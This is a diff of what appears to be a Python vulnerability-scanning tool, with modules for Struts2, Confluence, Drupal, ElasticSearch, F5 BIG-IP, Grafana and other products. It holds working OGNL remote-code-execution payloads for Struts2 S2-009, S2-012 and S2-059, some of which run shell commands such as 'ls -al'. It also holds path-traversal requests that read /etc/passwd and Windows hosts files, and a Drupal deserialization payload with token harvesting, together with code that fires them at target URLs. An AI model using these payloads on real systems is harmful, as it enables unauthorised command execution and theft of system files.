- 'path': '?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22echo%20{}%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()'.format(self.md),
- 'data': ''
- }
- ]
-
- self.s2_009_payloads = [
- {
- 'path': 'ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20{}%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]'.format(self.md),
- 'data': ''
- },
- {
- 'path': '?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20{}%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]'.format(self.md),
- 'data': ''
- }
- ]
-
- self.s2_012_payloads = [
- {
- 'path': 'user.action?name=%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%20%22{}%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D'.format(self.md),
- 'data': ''
- },
- {
- 'path': '?name=%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%20%22{}%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D'.format(self.md),
- 'data': ''
- }
- ]
-
- self.s2_059_payloads = [
- {
- 'path': "?payload=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20-al').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d",
- 'data': ""
- },
- {
- 'path': "",
- 'data': "payload=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20-al').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d"
- }
- ]
-
- def s2_001_scan(self, url):
- vul_info = {}
- vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'RCE'
- vul_info['vul_id'] = 'S2-001'
- vul_info['vul_method'] = 'POST'
- vul_info['headers'] = {}
-
- headers = self.headers
- headers.update(vul_info['headers']) # * 合并Headers
-
- for payload in self.s2_001_payloads: # * Payload
- path = payload['path'] # * Path
- data = payload['data'] # * Data
- target = url + path # * Target
-
- vul_info['path'] = path
- vul_info['data'] = data
- vul_info['target'] = target
-
- try:
- res = requests.post(
- target,
- timeout=self.timeout,
- headers=headers,
- data=data,
- proxies=self.proxies,
- verify=False
- )
- logger.logging(vul_info, res.status_code, res) # * LOG
- except requests.ConnectTimeout:
- logger.logging(vul_info, 'Timeout')
- return None
- except requests.ConnectionError:
- logger.logging(vul_info, 'Faild')
- return None
- except:
- logger.logging(vul_info, 'Error')
- return None
-
- if (self.md in check.check_res(res.text, self.md)):
- results = {
- 'Target': target,
- 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
- }
- return results
-
- def s2_005_scan(self, url):
- vul_info = {}
- vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'RCE'
- vul_info['vul_id'] = 'S2-005'
- vul_info['vul_method'] = 'GET'
- vul_info['headers'] = {}
-
- headers = self.headers
- headers.update(vul_info['headers']) # * 合并Headers
-
- for payload in self.s2_005_payloads: # * Payload
- path = payload['path'] # * Path
- data = payload['data'] # * Data
- target = url + path # * Target
-
- vul_info['path'] = path
- vul_info['data'] = data
- vul_info['target'] = target
-
- try:
- res = requests.get(
- target,
- timeout=self.timeout,
- headers=headers,
- data=data,
- proxies=self.proxies,
- verify=False
- )
- logger.logging(vul_info, res.status_code, res) # * LOG
- except requests.ConnectTimeout:
- logger.logging(vul_info, 'Timeout')
- return None
- except requests.ConnectionError:
- logger.logging(vul_info, 'Faild')
- return None
- except:
- logger.logging(vul_info, 'Error')
- return None
-
- if (self.md in check.check_res(res.text, self.md)):
- results = {
- 'Target': url + 'example/HelloWorld.action',
- 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path
- }
- }
- return results
-
- def s2_007_scan(self, url):
- vul_info = {}
- vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'RCE'
- vul_info['vul_id'] = 'S2-007'
- vul_info['vul_method'] = 'GET'
- vul_info['headers'] = {}
-
- headers = self.headers
- headers.update(vul_info['headers']) # * 合并Headers
-
- for payload in self.s2_007_payloads: # * Payload
- path = payload['path'] # * Path
- data = payload['data'] # * Data
- target = url + path # * Target
-
- vul_info['path'] = path
- vul_info['data'] = data
- vul_info['target'] = target
-
- try:
- res = requests.get(
- target,
- timeout=self.timeout,
- headers=headers,
- data=data,
- proxies=self.proxies,
- verify=False
- )
- logger.logging(vul_info, res.status_code, res) # * LOG
- except requests.ConnectTimeout:
- logger.logging(vul_info, 'Timeout')
- return None
- except requests.ConnectionError:
- logger.logging(vul_info, 'Faild')
- return None
- except:
- logger.logging(vul_info, 'Error')
- return None
-
- if (self.md in check.check_res(res.text, self.md)):
- results = {
- 'Target': url + 'user.action',
- 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path
- }
- }
- return results
-
- def s2_008_scan(self, url):
- vul_info = {}
- vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'RCE'
- vul_info['vul_id'] = 'S2-008'
- vul_info['vul_method'] = 'GET'
- vul_info['headers'] = {}
-
- headers = self.headers
- headers.update(vul_info['headers']) # * 合并Headers
-
- for payload in self.s2_008_payloads: # * Payload
- path = payload['path'] # * Path
- data = payload['data'] # * Data
- target = url + path # * Target
-
- vul_info['path'] = path
- vul_info['data'] = data
- vul_info['target'] = target
-
- try:
- res = requests.get(
- target,
- timeout=self.timeout,
- headers=headers,
- data=data,
- proxies=self.proxies,
- verify=False
- )
- logger.logging(vul_info, res.status_code, res) # * LOG
- except requests.ConnectTimeout:
- logger.logging(vul_info, 'Timeout')
- return None
- except requests.ConnectionError:
- logger.logging(vul_info, 'Faild')
- return None
- except:
- logger.logging(vul_info, 'Error')
- return None
-
- if (self.md in check.check_res(res.text, self.md)):
- results = {
- 'Target': url + 'devmode.action',
- 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path
- }
- }
- return results
-
- def s2_009_scan(self, url):
- vul_info = {}
- vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'RCE'
- vul_info['vul_id'] = 'S2-009'
- vul_info['vul_method'] = 'GET'
- vul_info['headers'] = {}
-
- # headers = self.headers
- # headers.update(vul_info['headers']) # * 合并Headers
-
- for payload in self.s2_009_payloads: # * Payload
- path = payload['path'] # * Path
- data = payload['data'] # * Data
- target = url + path # * Target
-
- vul_info['path'] = path
- vul_info['data'] = data
- vul_info['target'] = target
-
- try:
- res = requests.get(
- target,
- timeout=self.timeout,
- headers=self.headers,
- data=data,
- proxies=self.proxies,
- verify=False
- )
- logger.logging(vul_info, res.status_code, res) # * LOG
- except requests.ConnectTimeout:
- logger.logging(vul_info, 'Timeout')
- return None
- except requests.ConnectionError:
- logger.logging(vul_info, 'Faild')
- return None
- except:
- logger.logging(vul_info, 'Error')
- return None
-
- if (self.md in check.check_res(res.text, self.md)):
- results = {
- 'Target': url,
- 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path
- }
- }
- return results
-
- def s2_012_scan(self, url):
- vul_info = {}
- vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'RCE'
- vul_info['vul_id'] = 'S2-012(CVE-2013-1965)'
- vul_info['vul_method'] = 'GET'
- vul_info['headers'] = {}
-
- # headers = self.headers
- # headers.update(vul_info['headers']) # * 合并Headers
-
- for payload in self.s2_012_payloads: # * Payload
- path = payload['path'] # * Path
- data = payload['data'] # * Data
- target = url + path # * Target
-
- vul_info['path'] = path
- vul_info['data'] = data
- vul_info['target'] = target
-
- try:
- res = requests.get(
- target,
- timeout=self.timeout,
- headers=self.headers,
- data=data,
- proxies=self.proxies,
- verify=False
- )
- logger.logging(vul_info, res.status_code, res) # * LOG
- except requests.ConnectTimeout:
- logger.logging(vul_info, 'Timeout')
- return None
- except requests.ConnectionError:
- logger.logging(vul_info, 'Faild')
- return None
- except:
- logger.logging(vul_info, 'Error')
- return None
-
- if (self.md in check.check_res(res.text, self.md)):
- results = {
- 'Target': url,
- 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path
- }
- }
- return results
-
- def addscan(self, url, vuln=None):
- if vuln:
- return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
-
- return [
- thread(target=self.s2_001_scan, url=url),
- thread(target=self.s2_005_scan, url=url),
- thread(target=self.s2_007_scan, url=url),
- thread(target=self.s2_008_scan, url=url),
- thread(target=self.s2_009_scan, url=url),
- thread(target=self.s2_012_scan, url=url)
- ]
-struts2 = Struts2()
\ No newline at end of file
diff --git a/payloads/AtlassianConfluence.py b/payloads/AtlassianConfluence.py
index d232180..dd380e0 100644
--- a/payloads/AtlassianConfluence.py
+++ b/payloads/AtlassianConfluence.py
@@ -35,6 +35,7 @@
from lib.tool import head
from thirdparty import requests
from time import sleep
+import re
class AtlassianConfluence():
def __init__(self):
@@ -90,6 +91,26 @@ def __init__(self):
]
self.cve_2015_8399_payloads = [
+ {
+ 'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///etc/passwd',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'admin/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
{
'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd',
'data': '',
@@ -151,7 +172,8 @@ def cve_2019_3396_scan(self, url):
'''
vul_info = {}
vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'RCE/FileRead'
+ # vul_info['vul_type'] = 'FileRead/RCE'
+ vul_info['vul_type'] = 'FileRead'
vul_info['vul_id'] = 'CVE-2019-3396'
vul_info['vul_method'] = 'POST'
@@ -189,16 +211,16 @@ def cve_2019_3396_scan(self, url):
return None
if ((self.md in check.check_res(res.text, self.md))
- or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
or (('' in res.text) and ('Confluence' in res.text))
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': res
+ 'Request': res
}
return results
@@ -245,15 +267,15 @@ def cve_2021_26084_scan(self, url):
return None
if (('369630' in res.text)
- or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
- # or ('Microsoft Corp' in res.text)
- # or ('Microsoft TCP/IP for Windows' in res.text)
+ or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': res
+ 'Request': res
}
return results
@@ -301,16 +323,16 @@ def cve_2015_8399_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if ((('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
or (('' in res.text) and ('Confluence' in res.text))
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': res
+ 'Request': res
}
return results
@@ -364,7 +386,7 @@ def cve_2022_26134_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': res
+ 'Request': res
}
return results
elif (self.md in check.check_res(base64.b64decode(res.headers.get('X-Confluence', '')).decode(), self.md)):
@@ -374,7 +396,7 @@ def cve_2022_26134_scan(self, url):
'Method': vul_info['vul_method'],
'Response-Headers': 'X-Confluence: XXX',
'Response-Decode': 'Base64',
- 'Payload': res
+ 'Request': res
}
return results
diff --git a/payloads/Discuz.py b/payloads/Discuz.py
index 10d1e0d..2bbb8b3 100644
--- a/payloads/Discuz.py
+++ b/payloads/Discuz.py
@@ -107,7 +107,7 @@ def wooyun_2010_080723_scan(self, url): # todo 7: POC的名称(
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
diff --git a/payloads/Drupal.py b/payloads/Drupal.py
index fa0d76b..b2bd7d5 100644
--- a/payloads/Drupal.py
+++ b/payloads/Drupal.py
@@ -62,11 +62,11 @@ def __init__(self):
self.cve_2017_6920_payloads = [
{
'path': 'admin/config/development/configuration/single/import',
- 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token=HxdRhcKEhWWljaPOlYKS8WQvHNRaW3UyJWPGWmPwuKI&form_id=config_single_import_form&op=Import'
+ 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={}&form_id=config_single_import_form&op=Import'
},
{
'path': 'config/development/configuration/single/import',
- 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token=HxdRhcKEhWWljaPOlYKS8WQvHNRaW3UyJWPGWmPwuKI&form_id=config_single_import_form&op=Import'
+ 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={}&form_id=config_single_import_form&op=Import'
}
]
@@ -85,6 +85,25 @@ def __init__(self):
},
]
+ def get_form_token(self, target, vul_info):
+ ''' 获取drupal的form_token '''
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ form_token = re.search(r'name="form_token" value=".{43}', res.text, re.I|re.M|re.U|re.S)
+ if (form_token):
+ self.form_token = form_token.group().replace('name="form_token" value="', '')
+ return self.form_token
+ else:
+ return None
+
def cve_2018_7600_scan(self, url):
''' '''
vul_info = {}
@@ -132,7 +151,7 @@ def cve_2018_7600_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': res
+ 'Request': res
}
return results
@@ -185,7 +204,7 @@ def cve_2014_3704_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': res
+ 'Request': res
}
return results
@@ -193,7 +212,7 @@ def cve_2017_6920_scan(self, url):
''' '''
vul_info = {}
vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'unSerialize'
+ vul_info['vul_type'] = 'unSerialize/RCE'
vul_info['vul_id'] = 'CVE-2017-6920'
vul_info['vul_method'] = 'POST'
vul_info['headers'] = {}
@@ -211,6 +230,12 @@ def cve_2017_6920_scan(self, url):
vul_info['target'] = target
try:
+ form_token = self.get_form_token(target, vul_info)
+ if (form_token):
+ data = data.format(form_token)
+ else:
+ return None
+
res = requests.post(
target,
timeout=self.timeout,
@@ -236,7 +261,7 @@ def cve_2017_6920_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': res
+ 'Request': res
}
return results
@@ -263,19 +288,9 @@ def cve_2018_7602_scan(self, url):
try:
if payload == 0: # * 当payload为第1个时, 获取form_token
- res = requests.get(
- target,
- timeout=self.timeout,
- headers=self.headers,
- proxies=self.proxies,
- verify=False,
- allow_redirects=False
- )
- logger.logging(vul_info, res.status_code, res) # * LOG
-
- form_token = re.search(r'name="form_token" value=".{43}', res.text, re.I|re.M|re.U|re.S)
+ form_token = self.get_form_token(target, vul_info)
if (form_token):
- self.form_token = form_token.group().replace('name="form_token" value="', '')
+ continue
else:
return None
@@ -338,14 +353,12 @@ def cve_2018_7602_scan(self, url):
'Url': url,
'Path': self.cve_2018_7602_payloads[1]['path'],
'Data': self.cve_2018_7602_payloads[1]['data'].format(self.form_token),
- 'form_token': self.form_token
},
'Payload-3': {
'Method': 'POST',
'Url': url,
'Path': path,
'Data': data,
- 'form_build_id': self.form_build_id
}
}
return results
diff --git a/payloads/ElasticSearch.py b/payloads/ElasticSearch.py
index fe6ff92..aa4bf46 100644
--- a/payloads/ElasticSearch.py
+++ b/payloads/ElasticSearch.py
@@ -34,6 +34,7 @@
from lib.tool import head
from thirdparty import requests
from time import sleep
+import re
class ElasticSearch():
def __init__(self):
@@ -159,7 +160,7 @@ def cve_2014_3120_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
@@ -210,7 +211,7 @@ def cve_2015_1427_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
@@ -256,8 +257,10 @@ def cve_2015_3337_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)):
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ # or (('Microsoft Corp' in res.text)
+ # and ('Microsoft TCP/IP for Windows' in res.text))
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -345,7 +348,8 @@ def cve_2015_5531_scan(self, url):
'Path': path,
'Decode': 'ASCII decimal encode',
'Decode-Url': 'https://www.qqxiuzi.cn/bianma/ascii.htm'
- }
+ },
+ 'Request': res
}
return results
diff --git a/payloads/F5BIGIP.py b/payloads/F5BIGIP.py
index a720d90..6659ce2 100644
--- a/payloads/F5BIGIP.py
+++ b/payloads/F5BIGIP.py
@@ -20,6 +20,7 @@
from lib.tool.thread import thread
from lib.tool import check
from thirdparty import requests
+import re
class F5_BIG_IP():
def __init__(self):
@@ -128,10 +129,9 @@ def cve_2020_5902_scan(self, url):
if (('encrypted-password' in res.text)
or ('partition-access' in res.text)
or (('"output": "' in res.text) and ('"error": "",' in res.text))
- or ('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': target,
@@ -150,7 +150,8 @@ def cve_2022_1388_scan(self, url):
'''
vul_info = {}
vul_info['app_name'] = self.app_name
- vul_info['vul_type'] = 'unAuthorized'
+ # vul_info['vul_type'] = 'unAuthorized'
+ vul_info['vul_type'] = 'unAuth/RCE'
vul_info['vul_id'] = 'CVE-2022-1388'
vul_info['vul_method'] = 'POST'
vul_info['headers'] = {
@@ -193,12 +194,12 @@ def cve_2022_1388_scan(self, url):
return None
if (('commandResult' in res.text)
- and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ and re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': res
+ 'Request': res
}
return results
diff --git a/payloads/Gitea.py b/payloads/Gitea.py
index 486b99a..24a1450 100644
--- a/payloads/Gitea.py
+++ b/payloads/Gitea.py
@@ -22,6 +22,7 @@
from lib.tool import head
from thirdparty import requests
from time import sleep
+import re
class Gitea():
def __init__(self):
@@ -123,10 +124,9 @@ def gitea_unauthorized_scan(self, url):
)
logger.logging(vul_info, res2.status_code, res2) # * LOG
- if (('/sbin/nologin' in res2.text)
- or ('root:x:0:0:root' in res2.text)
- or ('Microsoft Corp' in res2.text)
- or ('Microsoft TCP/IP for Windows' in res2.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res2.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res2.text)
+ and ('Microsoft TCP/IP for Windows' in res2.text))
):
results = {
'Target': target,
diff --git a/payloads/Grafana.py b/payloads/Grafana.py
index face33b..0fe5cb1 100644
--- a/payloads/Grafana.py
+++ b/payloads/Grafana.py
@@ -20,6 +20,7 @@
from lib.tool import check
from thirdparty import requests
from time import sleep
+import re
class Grafana():
def __init__(self):
@@ -44,10 +45,10 @@ def __init__(self):
'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts',
'data': ''
},
- # {
- # 'path': 'plugins/{}/../../../../../../../../../../../../../etc/passwd',
- # 'data': ''
- # },
+ {
+ 'path': 'plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
# {
# 'path': '{}/../../../../../../../../../../../../../etc/passwd',
# 'data': ''
@@ -110,10 +111,9 @@ def cve_2021_43798_scan(self, url):
)
logger.logging(vul_info, res.status_code, res) # * LOG
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
):
results = {
'Target': res.request.url,
diff --git a/payloads/Landray.py b/payloads/Landray.py
index 71395d1..d98e3c6 100644
--- a/payloads/Landray.py
+++ b/payloads/Landray.py
@@ -21,6 +21,7 @@
from lib.tool import check
from thirdparty import requests
from time import sleep
+import re
class Landray():
def __init__(self):
@@ -109,10 +110,9 @@ def cnvd_2021_28277_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text)
- or ('root:x:0:0:root' in res.text)
- or ('Microsoft Corp' in res.text)
- or ('Microsoft TCP/IP for Windows' in res.text)
+ if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)
+ or (('Microsoft Corp' in res.text)
+ and ('Microsoft TCP/IP for Windows' in res.text))
or (('password' in res.text) and ('kmss.properties.encrypt.enabled = true' in res.text))
):
results = {
diff --git a/payloads/MiniHttpd.py b/payloads/MiniHttpd.py
index 4fb794c..ee4717e 100644
--- a/payloads/MiniHttpd.py
+++ b/payloads/MiniHttpd.py
@@ -21,6 +21,7 @@
from lib.tool import check
from thirdparty import requests
from time import sleep
+import re
class MiniHttpd():
def __init__(self):
@@ -28,7 +29,7 @@ def __init__(self):
self.headers = config.get('headers')
